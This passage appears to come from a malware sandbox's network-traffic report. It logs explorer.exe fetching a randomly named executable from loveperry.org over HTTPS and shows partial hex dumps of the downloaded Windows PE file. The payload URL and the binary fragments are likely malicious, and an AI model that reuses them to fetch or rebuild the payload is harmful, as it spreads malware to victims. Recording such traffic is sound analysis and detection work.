54 09 7c aa 5a 95 b8 61 77 11 ea f9 90 db 8c 19 55 30 5a 66 75 8d 49 d4 1f bb dc 94 44 be c1 a5 0e 93 d7 25 f7 04 07 51 63 52 50 65 a3 e4 27 c7 Data Ascii: {Y=9u"jv/CnR=YmV):V\l+I5B;!KT4 Bu!+t J=3j'enbhS;^S7m<nHL[j5dCp~yT\|ZawU0ZfuID%QcRPe'

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49739	172.67.213.185	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-13 13:21:11 UTC	248	OUT	GET /55945f02f36a77ce7ed6ee14da31275f/288c47bbc1871b439df19ff4df68f076.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: loveperry.org
2023-10-13 13:21:12 UTC	281	IN	HTTP/1.1 200 OK Date: Fri, 13 Oct 2023 13:21:12 GMT Content-Type: application/x-ms-dos-executable Content-Length: 4311960 Connection: close Last-Modified: Fri, 13 Oct 2023 12:51:08 GMT Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pdfWil7ORVPW98A42Wm8u%2BoOVm%2F7gmTzxDRznwvLdYrzXHezocgNzQZ4bQV4KPJL0Wp39y7hAuSmunA4rxHDhsoPiFMvFfEAESwi3IVXa8l6qj3HmKsB1Ov5m2EgSeIO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8157e26099a128fd-LAX alt-svc: h3=":443"; ma=86400
2023-10-13 13:21:12 UTC	281	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 75 03 0d 8d 31 62 63 de 31 62 63 de 31 62 63 de 2f 30 e7 de 1c 62 63 de 2f 30 f6 de 27 62 63 de 2f 30 e0 de b3 62 63 de 16 a4 18 de 36 62 63 de 31 62 62 de b9 62 63 de 2f 30 e9 de 30 62 63 de 2f 30 f7 de 30 62 63 de 2f 30 f2 de 30 62 63 de 52 69 63 68 31 62 63 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8d d6 26 63 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$u1bc1bc1bc/0bc/0'bc/0bc6bc1bbbc/00bc/00bc/00bcRich1bcPEL&c
2023-10-13 13:21:12 UTC	282	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2023-10-13 13:21:12 UTC	283	IN	Data Raw: 74 56 61 6c 75 65 00 46 6c 73 47 65 74 56 61 6c 75 65 00 46 6c 73 41 6c 6c 6f 63 00 00 00 00 43 6f 72 45 78 69 74 50 72 6f 63 65 73 73 00 00 6d 00 73 00 63 00 6f 00 72 00 65 00 65 00 2e 00 64 00 6c 00 6c 00 00 00 63 63 73 00 55 54 46 2d 38 00 00 00 55 54 46 2d 31 36 4c 45 00 00 00 00 55 4e 49 43 4f 44 45 00 72 75 6e 74 69 6d 65 20 65 72 72 6f 72 20 00 00 0d 0a 00 00 54 4c 4f 53 53 20 65 72 72 6f 72 0d 0a 00 00 00 53 49 4e 47 20 65 72 72 6f 72 0d 0a 00 00 00 00 44 4f 4d 41 49 4e 20 65 72 72 6f 72 0d 0a 00 00 00 00 00 00 52 36 30 33 34 0d 0a 41 6e 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 68 61 73 20 6d 61 64 65 20 61 6e 20 61 74 74 65 6d 70 74 20 74 6f 20 6c 6f 61 64 20 74 68 65 20 43 20 72 75 6e 74 69 6d 65 20 6c 69 62 72 61 72 79 20 69 6e 63 6f 72 72 65 63 Data Ascii: tValueFlsGetValueFlsAllocCorExitProcessmscoree.dllccsUTF-8UTF-16LEUNICODEruntime error TLOSS errorSING errorDOMAIN errorR6034An application has made an attempt to load the C runtime library incorrec
2023-10-13 13:21:12 UTC	285	IN	Data Raw: 66 6f 72 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 0d 0a 00 52 36 30 30 38 0d 0a 2d 20 6e 6f 74 20 65 6e 6f 75 67 68 20 73 70 61 63 65 20 66 6f 72 20 61 72 67 75 6d 65 6e 74 73 0d 0a 00 00 00 52 36 30 30 32 0d 0a 2d 20 66 6c 6f 61 74 69 6e 67 20 70 6f 69 6e 74 20 73 75 70 70 6f 72 74 20 6e 6f 74 20 6c 6f 61 64 65 64 0d 0a 00 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 52 75 6e 74 69 6d 65 20 4c 69 62 72 61 72 79 00 00 00 00 0a 0a 00 00 2e 2e 2e 00 3c 70 72 6f 67 72 61 6d 20 6e 61 6d 65 20 75 6e 6b 6e 6f 77 6e 3e 00 00 52 75 6e 74 69 6d 65 20 45 72 72 6f 72 21 0a 0a 50 72 6f 67 72 61 6d 3a 20 00 00 00 00 00 00 00 05 00 00 c0 0b 00 00 00 00 00 00 00 1d 00 00 c0 04 00 00 00 00 00 00 00 96 00 00 c0 04 00 00 00 00 00 00 00 8d 00 00 c0 08 Data Ascii: for environmentR6008- not enough space for argumentsR6002- floating point support not loadedMicrosoft Visual C++ Runtime Library...<program name unknown>Runtime Error!Program:
2023-10-13 13:21:12 UTC	286	IN	Data Raw: 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 60 65 68 20 76 65 63 74 6f 72 20 64 65 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 60 65 68 20 76 65 63 74 6f 72 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 76 69 72 74 75 61 6c 20 64 69 73 70 6c 61 63 65 6d 65 6e 74 20 6d 61 70 27 00 00 60 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 60 76 65 63 74 6f 72 20 64 65 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 76 65 63 74 6f 72 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 60 73 63 61 6c 61 72 20 64 65 6c 65 74 69 6e 67 20 64 65 73 74 72 75 63 74 6f 72 27 00 00 00 00 60 64 65 66 61 75 Data Ascii: nstructor iterator'`eh vector destructor iterator'`eh vector constructor iterator'`virtual displacement map'`vector vbase constructor iterator'`vector destructor iterator'`vector constructor iterator'`scalar deleting destructor'`defau
2023-10-13 13:21:12 UTC	287	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 28 00 28 00 28 00 28 00 28 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 48 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 81 00 81 00 81 00 81 00 81 00 81 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 Data Ascii: ((((( H
2023-10-13 13:21:12 UTC	289	IN	Data Raw: 75 76 77 78 79 7a 7b 7c 7d 7e 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 Data Ascii: uvwxyz{\|}~
2023-10-13 13:21:12 UTC	290	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 bc 80 00 88 2f 40 00 00 00 00 00 00 00 00 00 00 00 00 00 08 a0 80 00 08 2f 40 00 00 00 00 00 00 00 00 00 01 00 00 00 18 2f 40 00 20 2f 40 00 00 00 00 00 08 a0 80 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 08 2f 40 00 00 00 00 00 00 00 00 00 00 00 00 00 50 b4 80 00 50 2f 40 00 00 00 00 00 00 00 00 00 02 00 00 00 60 2f 40 00 a0 2f 40 00 6c 2f 40 00 00 00 00 00 c8 bc 80 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 88 2f 40 00 00 00 00 00 00 00 00 00 01 00 00 00 98 2f 40 00 6c 2f 40 00 00 00 00 00 50 b4 80 00 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 50 2f 40 00 00 00 00 00 30 5a 00 00 e8 6f 00 00 28 b8 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: /@/@/@ /@@/@PP/@`/@/@l/@@/@/@l/@P@P/@0Zo(
2023-10-13 13:21:12 UTC	291	IN	Data Raw: 11 40 00 57 57 57 ff 15 7c 10 40 00 68 d8 2d 40 00 57 e8 cf 07 00 00 59 59 8d 75 f0 e8 90 fb ff ff 8b ce e8 a9 fb ff ff 57 e8 a0 05 00 00 57 57 e8 a4 05 00 00 57 e8 d0 06 00 00 57 e8 42 08 00 00 83 c4 10 89 3c 24 e8 af fb ff ff dd d8 57 e8 b7 06 00 00 59 e8 ae 07 00 00 81 05 08 4b fa 02 4b 13 01 00 53 ff 35 08 4b fa 02 57 ff 15 34 10 40 00 a3 58 3a fa 02 e8 84 fe ff ff 8b 1d 5c 10 40 00 33 f6 ff d3 ff 15 ac 10 40 00 81 fe 47 6d 20 00 7f 09 46 81 fe a4 f6 04 00 7c e7 33 f6 39 3d 08 4b fa 02 76 42 81 3d 08 4b fa 02 a8 00 00 00 a1 0c 4b fa 02 8a 84 30 4b 13 01 00 8b 0d 58 3a fa 02 88 04 31 75 18 57 ff 15 54 10 40 00 8d 45 fc 50 8d 85 f0 fb ff ff 50 ff 15 c4 10 40 00 46 3b 35 08 4b fa 02 72 be 33 f6 a1 08 4b fa 02 03 c6 83 f8 0e 75 11 8d 45 fc 50 57 ff 15 30 Data Ascii: @WWW\|@h-@WYYuWWWWWB<$WYKKS5KW4@X:\@3@Gm F\|39=KvB=KK0KX:1uWT@EPP@F;5Kr3KuEPW0
2023-10-13 13:21:12 UTC	293	IN	Data Raw: e8 88 20 00 00 c3 8b ff 55 8b ec 51 83 65 fc 00 56 8d 45 fc 50 ff 75 0c ff 75 08 e8 14 22 00 00 8b f0 83 c4 0c 85 f6 75 18 39 45 fc 74 13 e8 ee 06 00 00 85 c0 74 0a e8 e5 06 00 00 8b 4d fc 89 08 8b c6 5e c9 c3 8b ff 55 8b ec 6a 0a 6a 00 ff 75 08 e8 2a 25 00 00 83 c4 0c 5d c3 8b ff 55 8b ec ff 75 0c 6a 0a 6a 00 ff 75 08 e8 3c 25 00 00 83 c4 10 5d c3 8b ff 55 8b ec 5d e9 c6 ff ff ff 8b ff 55 8b ec 5d e9 d1 ff ff ff 8b ff 55 8b ec 51 53 56 57 ff 35 4c 5c fa 02 e8 a5 25 00 00 ff 35 48 5c fa 02 8b f8 89 7d fc e8 95 25 00 00 8b f0 59 59 3b f7 0f 82 83 00 00 00 8b de 2b df 8d 43 04 83 f8 04 72 77 57 e8 78 2b 00 00 8b f8 8d 43 04 59 3b f8 73 48 b8 00 08 00 00 3b f8 73 02 8b c7 03 c7 3b c7 72 0f 50 ff 75 fc e8 06 2b 00 00 59 59 85 c0 75 16 8d 47 10 3b c7 72 40 50 Data Ascii: UQeVEPuu"u9EttM^Ujju*%]Uujju<%]U]U]UQSVW5L\%5H\}%YY;+CrwWx+CY;sH;s;rPu+YYuG;r@P
2023-10-13 13:21:12 UTC	294	IN	Data Raw: 00 00 89 46 04 8b 46 08 f6 40 70 02 75 14 83 48 70 02 c6 46 0c 01 eb 0a 8b 08 89 0e 8b 40 04 89 46 04 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 8b 45 08 a3 b0 bd 80 00 5d c3 8b ff 55 8b ec 81 ec 28 03 00 00 a1 88 a6 80 00 33 c5 89 45 fc 83 a5 d8 fc ff ff 00 53 6a 4c 8d 85 dc fc ff ff 6a 00 50 e8 9a 53 00 00 8d 85 d8 fc ff ff 89 85 28 fd ff ff 8d 85 30 fd ff ff 83 c4 0c 89 85 2c fd ff ff 89 85 e0 fd ff ff 89 8d dc fd ff ff 89 95 d8 fd ff ff 89 9d d4 fd ff ff 89 b5 d0 fd ff ff 89 bd cc fd ff ff 66 8c 95 f8 fd ff ff 66 8c 8d ec fd ff ff 66 8c 9d c8 fd ff ff 66 8c 85 c4 fd ff ff 66 8c a5 c0 fd ff ff 66 8c ad bc fd ff ff 9c 8f 85 f0 fd ff ff 8b 45 04 8d 4d 04 c7 85 30 fd ff ff 01 00 01 00 89 85 e8 fd ff ff 89 8d f4 fd ff ff 8b 49 fc 89 8d e4 fd ff ff c7 85 d8 fc ff Data Ascii: FF@puHpF@F^]UE]U(3ESjLjPS(0,ffffffEM0I
2023-10-13 13:21:12 UTC	295	IN	Data Raw: 81 e2 ff 07 00 00 83 c4 0c 81 ea fe 03 00 00 8b 45 10 89 10 5d c3 8b ff 55 8b ec 51 51 d9 ee 8b 45 08 dd 5d f8 89 45 f8 8b 45 14 33 45 0c 25 ff ff ff 7f 33 45 14 89 45 fc dd 45 f8 c9 c3 8b ff 55 8b ec 8b 45 08 8a 4d 10 53 56 57 33 ff 89 78 04 8b 45 08 33 db 89 78 08 8b 45 08 43 89 78 0c f6 c1 10 74 0d 8b 45 08 09 58 04 c7 45 10 8f 00 00 c0 f6 c1 02 74 0e 8b 45 08 83 48 04 02 c7 45 10 93 00 00 c0 84 cb 74 0e 8b 45 08 83 48 04 04 c7 45 10 91 00 00 c0 f6 c1 04 74 0e 8b 45 08 83 48 04 08 c7 45 10 8e 00 00 c0 f6 c1 08 74 0e 8b 45 08 83 48 04 10 c7 45 10 90 00 00 c0 8b 75 0c 8b 0e 8b 45 08 c1 e1 04 f7 d1 33 48 08 83 e1 10 31 48 08 8b 0e 8b 45 08 03 c9 f7 d1 33 48 08 83 e1 08 31 48 08 8b 0e 8b 45 08 d1 e9 f7 d1 33 48 08 83 e1 04 31 48 08 8b 0e 8b 45 08 c1 e9 03 Data Ascii: E]UQQE]EE3E%3EEEUEMSVW3xE3xECxtEXEtEHEtEHEtEHEtEHEuE3H1HE3H1HE3H1HE
2023-10-13 13:21:12 UTC	297	IN	Data Raw: 05 eb 17 a8 08 74 05 33 c0 40 5d c3 a8 04 74 04 6a 02 eb 06 a8 01 74 05 6a 03 58 5d c3 0f b6 c0 83 e0 02 03 c0 5d c3 8b ff 55 8b ec 83 ec 20 33 c0 8b 0c c5 c8 a1 80 00 3b 4d 0c 74 64 40 83 f8 1d 7c ee 33 c0 89 45 e4 85 c0 74 5e 8b 45 10 89 45 e8 8b 45 14 89 45 ec 8b 45 18 89 45 f0 8b 45 1c 56 8b 75 08 89 45 f4 8b 45 20 89 45 f8 8b 45 24 68 ff ff 00 00 ff 75 28 89 75 e0 89 45 fc e8 9d 01 00 00 8d 45 e0 50 e8 3a 49 00 00 83 c4 0c 85 c0 75 07 56 e8 2c ff ff ff 59 dd 45 f8 5e c9 c3 8b 04 c5 cc a1 80 00 eb 9b 68 ff ff 00 00 ff 75 28 e8 6a 01 00 00 ff 75 08 e8 07 ff ff ff dd 45 20 83 c4 0c c9 c3 8b ff 55 8b ec 51 51 83 3d f0 ad 80 00 00 dd 45 0c dc 45 14 dd 5d f8 75 29 ff 75 1c dd 45 f8 83 ec 18 dd 5c 24 10 dd 45 14 dd 5c 24 08 dd 45 0c dd 1c 24 ff 75 08 6a 01 Data Ascii: t3@]tjtjX]]U 3;Mtd@\|3Et^EEEEEEEVuEE EE$hu(uEEP:IuV,YE^hu(juE UQQ=EE]u)uE\$E\$E$uj
2023-10-13 13:21:12 UTC	298	IN	Data Raw: 50 e8 22 ff ff ff 59 85 c0 75 08 6a 11 e8 a2 17 00 00 59 ff 36 ff 15 00 11 40 00 5e 5d c3 8b ff 55 8b ec 8b 0d 58 5c fa 02 a1 5c 5c fa 02 6b c9 14 03 c8 eb 11 8b 55 08 2b 50 0c 81 fa 00 00 10 00 72 09 83 c0 14 3b c1 72 eb 33 c0 5d c3 8b ff 55 8b ec 83 ec 10 8b 4d 08 8b 41 10 56 8b 75 0c 57 8b fe 2b 79 0c 83 c6 fc c1 ef 0f 8b cf 69 c9 04 02 00 00 8d 8c 01 44 01 00 00 89 4d f0 8b 0e 49 89 4d fc f6 c1 01 0f 85 d3 02 00 00 53 8d 1c 31 8b 13 89 55 f4 8b 56 fc 89 55 f8 8b 55 f4 89 5d 0c f6 c2 01 75 74 c1 fa 04 4a 83 fa 3f 76 03 6a 3f 5a 8b 4b 04 3b 4b 08 75 42 bb 00 00 00 80 83 fa 20 73 19 8b ca d3 eb 8d 4c 02 04 f7 d3 21 5c b8 44 fe 09 75 23 8b 4d 08 21 19 eb 1c 8d 4a e0 d3 eb 8d 4c 02 04 f7 d3 21 9c b8 c4 00 00 00 fe 09 75 06 8b 4d 08 21 59 04 8b 5d 0c 8b 53 Data Ascii: P"YujY6@^]UX\\\kU+Pr;r3]UMAVuW+yiDMIMS1UVUU]utJ?vj?ZK;KuB sL!\Du#M!JL!uM!Y]S
2023-10-13 13:21:12 UTC	299	IN	Data Raw: 8d 7c 39 fc 8b 1f 89 4d 10 89 5d fc 0f 8e 55 01 00 00 f6 c3 01 0f 85 45 01 00 00 03 d9 3b f3 0f 8f 3b 01 00 00 8b 4d fc c1 f9 04 49 89 4d f8 83 f9 3f 76 06 6a 3f 59 89 4d f8 8b 5f 04 3b 5f 08 75 43 bb 00 00 00 80 83 f9 20 73 1a d3 eb 8b 4d f8 8d 4c 01 04 f7 d3 21 5c 90 44 fe 09 75 26 8b 4d 08 21 19 eb 1f 83 c1 e0 d3 eb 8b 4d f8 8d 4c 01 04 f7 d3 21 9c 90 c4 00 00 00 fe 09 75 06 8b 4d 08 21 59 04 8b 4f 08 8b 5f 04 89 59 04 8b 4f 04 8b 7f 08 89 79 08 8b 4d 10 2b ce 01 4d fc 83 7d fc 00 0f 8e a5 00 00 00 8b 7d fc 8b 4d 0c c1 ff 04 4f 8d 4c 31 fc 83 ff 3f 76 03 6a 3f 5f 8b 5d f4 8d 1c fb 89 5d 10 8b 5b 04 89 59 04 8b 5d 10 89 59 08 89 4b 04 8b 59 04 89 4b 08 8b 59 04 3b 59 08 75 57 8a 4c 07 04 88 4d 13 fe c1 88 4c 07 04 83 ff 20 73 1c 80 7d 13 00 75 0e 8b cf Data Ascii: \|9M]UE;;MIM?vj?YM_;_uC sML!\Du&M!ML!uM!YO_YOyM+M}}MOL1?vj?_]][Y]YKYKY;YuWLML s}u
2023-10-13 13:21:12 UTC	301	IN	Data Raw: 8d 79 01 89 3e 85 c9 75 1a 3b 1d 10 bf 80 00 75 12 8b 4d fc 3b 0d 6c 5c fa 02 75 07 83 25 10 bf 80 00 00 8b 4d fc 89 08 8d 42 04 5f 5e 5b c9 c3 cc cc 68 30 5a 40 00 64 ff 35 00 00 00 00 8b 44 24 10 89 6c 24 10 8d 6c 24 10 2b e0 53 56 57 a1 88 a6 80 00 31 45 fc 33 c5 50 89 65 e8 ff 75 f8 8b 45 fc c7 45 fc fe ff ff ff 89 45 f8 8d 45 f0 64 a3 00 00 00 00 c3 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5f 5e 5b 8b e5 5d 51 c3 cc cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 18 53 8b 5d 0c 56 8b 73 08 33 35 88 a6 80 00 57 8b 06 c6 45 ff 00 c7 45 f4 01 00 00 00 8d 7b 10 83 f8 fe 74 0d 8b 4e 04 03 cf 33 0c 38 e8 c8 37 00 00 8b 4e 0c 8b 46 08 03 cf 33 0c 38 e8 b8 37 00 00 8b 45 08 f6 40 04 66 0f 85 16 01 00 00 8b 4d 10 8d 55 e8 89 53 fc 8b 5b 0c 89 45 e8 89 4d ec 83 fb fe 74 5f Data Ascii: y>u;uM;l\u%MB_^[h0Z@d5D$l$l$+SVW1E3PeuEEEEdMdY__^[]QUS]Vs35WEE{tN387NF387E@fMUS[EMt_
2023-10-13 13:21:12 UTC	302	IN	Data Raw: f8 00 74 07 8b 45 f4 83 60 70 fd 33 c0 5b 5f 5e c9 c3 8b ff 55 8b ec 33 c0 50 ff 75 10 ff 75 0c ff 75 08 39 05 b0 c3 80 00 75 07 68 b8 ad 80 00 eb 01 50 e8 ab fd ff ff 83 c4 14 5d c3 8b ff 55 8b ec 6a 00 ff 75 10 ff 75 0c ff 75 08 ff 75 14 e8 8e fd ff ff 83 c4 14 5d c3 8b ff 55 8b ec 56 ff 35 fc a3 80 00 8b 35 0c 11 40 00 ff d6 85 c0 74 21 a1 f8 a3 80 00 83 f8 ff 74 17 50 ff 35 fc a3 80 00 ff d6 ff d0 85 c0 74 08 8b 80 f8 01 00 00 eb 27 be e0 13 40 00 56 ff 15 08 11 40 00 85 c0 75 0b 56 e8 d0 06 00 00 59 85 c0 74 18 68 d0 13 40 00 50 ff 15 60 10 40 00 85 c0 74 08 ff 75 08 ff d0 89 45 08 8b 45 08 5e 5d c3 6a 00 e8 87 ff ff ff 59 c3 8b ff 55 8b ec 56 ff 35 fc a3 80 00 8b 35 0c 11 40 00 ff d6 85 c0 74 21 a1 f8 a3 80 00 83 f8 ff 74 17 50 ff 35 fc a3 80 00 ff Data Ascii: tE`p3[_^U3Puuu9uhP]Ujuuuu]UV55@t!tP5t'@V@uVYth@P`@tuEE^]jYUV55@t!tP5
2023-10-13 13:21:12 UTC	303	IN	Data Raw: 1c bf 80 00 a3 18 bf 80 00 e8 f3 fa ff ff ff 35 20 bf 80 00 a3 1c bf 80 00 e8 e3 fa ff ff 83 c4 10 a3 20 bf 80 00 e8 e0 e8 ff ff 85 c0 74 65 68 32 62 40 00 ff 35 14 bf 80 00 e8 3d fb ff ff 59 ff d0 a3 f8 a3 80 00 83 f8 ff 74 48 68 14 02 00 00 6a 01 e8 8b 00 00 00 8b f0 59 59 85 f6 74 34 56 ff 35 f8 a3 80 00 ff 35 1c bf 80 00 e8 0a fb ff ff 59 ff d0 85 c0 74 1b 6a 00 56 e8 e7 fb ff ff 59 59 ff 15 24 11 40 00 83 4e 04 ff 89 06 33 c0 40 eb 07 e8 92 fb ff ff 33 c0 5f 5e c3 8b ff 55 8b ec 56 57 33 f6 ff 75 08 e8 aa dc ff ff 8b f8 59 85 ff 75 27 39 05 24 bf 80 00 76 1f 56 ff 15 2c 11 40 00 8d 86 e8 03 00 00 3b 05 24 bf 80 00 76 03 83 c8 ff 8b f0 83 f8 ff 75 ca 8b c7 5f 5e 5d c3 8b ff 55 8b ec 56 57 33 f6 6a 00 ff 75 0c ff 75 08 e8 73 f6 ff ff 8b f8 83 c4 0c 85 Data Ascii: 5 teh2b@5=YtHhjYYt4V55YtjVYY$@N3@3_^UVW3uYu'9$vV,@;$vu_^]UVW3juus
2023-10-13 13:21:12 UTC	305	IN	Data Raw: 40 5c fa 02 56 6a 14 5e 85 c0 75 07 b8 00 02 00 00 eb 06 3b c6 7d 07 8b c6 a3 40 5c fa 02 6a 04 50 e8 64 fb ff ff 59 59 a3 20 4c fa 02 85 c0 75 1e 6a 04 56 89 35 40 5c fa 02 e8 4b fb ff ff 59 59 a3 20 4c fa 02 85 c0 75 05 6a 1a 58 5e c3 33 d2 b9 08 a4 80 00 eb 05 a1 20 4c fa 02 89 0c 02 83 c1 20 83 c2 04 81 f9 88 a6 80 00 7c ea 6a fe 5e 33 d2 b9 18 a4 80 00 57 8b c2 c1 f8 05 8b 04 85 20 4b fa 02 8b fa 83 e7 1f c1 e7 06 8b 04 07 83 f8 ff 74 08 3b c6 74 04 85 c0 75 02 89 31 83 c1 20 42 81 f9 78 a4 80 00 7c ce 5f 33 c0 5e c3 e8 ca 41 00 00 80 3d 50 bf 80 00 00 74 05 e8 93 3f 00 00 ff 35 20 4c fa 02 e8 89 ce ff ff 59 c3 8b ff 55 8b ec 56 8b 75 08 b8 08 a4 80 00 3b f0 72 22 81 fe 68 a6 80 00 77 1a 8b ce 2b c8 c1 f9 05 83 c1 10 51 e8 34 e4 ff ff 81 4e 0c 00 80 Data Ascii: @\Vj^u;}@\jPdYY LujV5@\KYY LujX^3 L \|j^3W Kt;tu1 Bx\|_3^A=Pt?5 LYUVu;r"hw+Q4N
2023-10-13 13:21:12 UTC	306	IN	Data Raw: 1b 8b 04 06 83 c0 20 50 ff 15 00 11 40 00 a1 20 4c fa 02 8b 3c 06 89 7d e4 89 5f 0c 3b fb 74 16 81 67 0c 00 80 00 00 89 5f 04 89 5f 08 89 1f 89 5f 1c 83 4f 10 ff c7 45 fc fe ff ff ff e8 0b 00 00 00 8b c7 e8 ca ea ff ff c3 8b 7d e4 6a 01 e8 a7 de ff ff 59 c3 53 56 57 8b 54 24 10 8b 44 24 14 8b 4c 24 18 55 52 50 51 51 68 e8 6f 40 00 64 ff 35 00 00 00 00 a1 88 a6 80 00 33 c4 89 44 24 08 64 89 25 00 00 00 00 8b 44 24 30 8b 58 08 8b 4c 24 2c 33 19 8b 70 0c 83 fe fe 74 3b 8b 54 24 34 83 fa fe 74 04 3b f2 76 2e 8d 34 76 8d 5c b3 10 8b 0b 89 48 0c 83 7b 04 00 75 cc 68 01 01 00 00 8b 43 08 e8 52 49 00 00 b9 01 00 00 00 8b 43 08 e8 64 49 00 00 eb b0 64 8f 05 00 00 00 00 83 c4 18 5f 5e 5b c3 8b 4c 24 04 f7 41 04 06 00 00 00 b8 01 00 00 00 74 33 8b 44 24 08 8b 48 08 Data Ascii: P@ L<}_;tg___OE}jYSVWT$D$L$URPQQho@d53D$d%D$0XL$,3pt;T$4t;v.4v\H{uhCRICdId_^[L$At3D$H
